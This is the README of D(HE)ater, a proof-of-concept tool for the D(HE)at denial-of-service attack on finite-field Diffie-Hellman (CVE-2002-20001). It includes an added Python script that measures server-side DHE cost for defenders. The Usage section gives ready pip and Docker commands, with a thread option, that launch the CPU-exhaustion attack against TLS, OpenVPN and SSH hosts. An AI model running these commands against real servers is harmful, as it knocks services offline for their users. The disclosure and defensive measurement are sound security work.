D(HE)ater
Summary
D(HE)ater is the proof-of-concept implementation of the D(HE)at attack (CVE-2002-20001). It is an attack tool based on CPU heating: it forces a server to perform the CPU-intensive operations of the ephemeral variant of the Diffie-Hellman key exchange (DHE) in a given cryptographic protocol (e.g. TLS, OpenVPN, SSH).
During a DHE key exchange the CPU-intensive operation (modular exponentiation) is performed twice: once to generate the ephemeral public key and once to calculate the shared key. D(HE)ater forces the server to generate its DHE public key, and even to calculate the shared key, while the client side never generates a cryptographically correct ephemeral private/public key pair. The client therefore pays no calculation cost, whereas the server pays a significant one. This asymmetry is the basis of the denial-of-service (DoS) attack.
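The following script is an added example, not part of D(HE)ater or CryptoLyzer. It shows the asymmetry described above from the server's point of view so a defender can size the risk: it times the two modular exponentiations a server performs per finite-field DHE exchange and turns that into a rough handshakes-per-second capacity for one core, which is the number a rate limit or a connection cap has to stay below. The modulus is the 2048-bit MODP prime of RFC 3526 group 14 (the group behind SSH's diffie-hellman-group14-* methods), transcribed here and verified with a Fermat check at import time; the 256-bit server exponent length and the function names are assumptions made for the example.

```python
"""Estimate the per-exchange server cost of finite-field DHE (added example)."""
import secrets
import time

# 2048-bit MODP prime, RFC 3526 group 14, generator 2 (transcribed here;
# modulus_is_sane() below rejects a mistranscribed value).
MODP_2048_HEX = (
    "FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74"
    "020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F1437"
    "4FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED"
    "EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF05"
    "98DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB"
    "9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3B"
    "E39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF695581718"
    "3995497CEA956AE515D2261898FA051015728E5A8AACAA68FFFFFFFFFFFFFFFF"
)
P = int(MODP_2048_HEX, 16)
G = 2


def modulus_is_sane():
    """Cheap Fermat test with base 2; true for the genuine RFC 3526 prime."""
    return P.bit_length() == 2048 and pow(2, P - 1, P) == 1


def validate_peer_public(peer_public):
    """Range check every server should do (RFC 7919 style): 2 <= y <= p-2.

    This rejects the degenerate values 0, 1 and p-1, but it is cheap and
    it does not stop the cost asymmetry: any in-range value is accepted.
    """
    return 2 <= peer_public <= P - 2


def server_key_exchange(peer_public, exponent_bits=256):
    """The server's share of the work: two 2048-bit modular exponentiations.

    exponent_bits is an assumption; real servers use between 256 bits and
    the full modulus size depending on the library and group.
    """
    if not validate_peer_public(peer_public):
        raise ValueError("peer public value out of range")
    y = secrets.randbits(exponent_bits) | 1          # ephemeral private key
    server_public = pow(G, y, P)                      # exponentiation 1
    shared_secret = pow(peer_public, y, P)            # exponentiation 2
    return server_public, shared_secret


def seconds_per_exchange(rounds=20):
    """Average server-side cost of one DHE exchange against a fixed peer value.

    The peer value 2 is g^1: valid for the range check, but the sender did
    no modular exponentiation to produce it. That is the asymmetry.
    """
    peer_public = 2
    start = time.perf_counter()
    for _ in range(rounds):
        server_key_exchange(peer_public)
    return (time.perf_counter() - start) / rounds


def exchanges_per_core_second(rounds=20):
    """Rough single-core capacity; a sensible per-source rate limit is far below it."""
    return 1.0 / seconds_per_exchange(rounds)


if __name__ == "__main__":
    assert modulus_is_sane()
    cost = seconds_per_exchange()
    print(f"server cost per DHE exchange: {cost * 1e3:.2f} ms")
    print(f"approx. exchanges one core can serve per second: {1 / cost:.0f}")
```

The number printed is for Python's big-integer arithmetic, so a native TLS or SSH stack will do better, but the shape is what matters: the per-exchange cost sits entirely on the side that validates nothing beyond a range check. Disabling finite-field DHE in favour of ECDHE, or capping concurrent handshakes per source, are the levers this measurement informs.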
Usage
D(HE)ater can be installed directly via pip from PyPI:
pip install dheater
dheat --protocol tls ecc256.badssl.com
dheat --protocol ssh ecc256.badssl.com
or it can be used via Docker from Docker Hub:
docker pull coroner/dheater
docker run --tty --rm coroner/dheater --protocol tls ecc256.badssl.com
docker run --tty --rm coroner/dheater --protocol tls openvpn://vpn.example.com
docker run --tty --rm coroner/dheater --protocol tls openvpntcp://vpn.example.com:443
docker run --tty --rm coroner/dheater --protocol ssh ecc256.badssl.com
You can increase the load by adding extra threads:
dheat --thread-num 4 --protocol tls ecc256.badssl.com
docker run --tty --rm coroner/dheater --thread-num 4 --protocol tls ecc256.badssl.com
docker run --tty --rm coroner/dheater --thread-num 4 --protocol tls openvpn://vpn.example.com
docker run --tty --rm coroner/dheater --thread-num 4 --protocol tls openvpntcp://vpn.example.com:443
docker run --tty --rm coroner/dheater --thread-num 4 --protocol ssh ecc256.badssl.com
Credits
The implementation is powered by CryptoLyzer, an analyzer of server-side cryptographic protocol (TLS, SSL, SSH, DNSSEC) settings.